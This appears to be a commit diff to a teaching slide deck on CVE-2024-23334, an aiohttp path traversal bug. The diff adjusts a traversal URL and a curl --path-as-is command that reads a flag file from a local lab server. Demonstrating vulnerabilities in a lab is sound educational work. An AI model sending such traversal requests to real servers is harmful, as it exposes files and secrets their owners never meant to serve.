<commit_message>
fix: align lab demo paths and portability
</commit_message>
<xml_diff>
--- a/CVE-2024-23334-aiohttp-Path-Traversal.pptx
+++ b/CVE-2024-23334-aiohttp-Path-Traversal.pptx
@@ -3657,7 +3657,7 @@
                 <a:latin typeface="Consolas"/>
                 <a:ea typeface="Consolas"/>
               </a:rPr>
-              <a:t>/assets-library/../../config/secret_flag.txt</a:t>
+              <a:t>/assets-library/../config/secret_flag.txt</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6568,7 +6568,7 @@
                 <a:latin typeface="Consolas"/>
                 <a:ea typeface="Consolas"/>
               </a:rPr>
-              <a:t>curl --path-as-is \\\n  http://localhost:8081/assets-library/../../config/secret_flag.txt</a:t>
+              <a:t>curl --path-as-is \\\n  http://localhost:8081/assets-library/../config/secret_flag.txt</a:t>
             </a:r>
           </a:p>
         </p:txBody>

</xml_diff>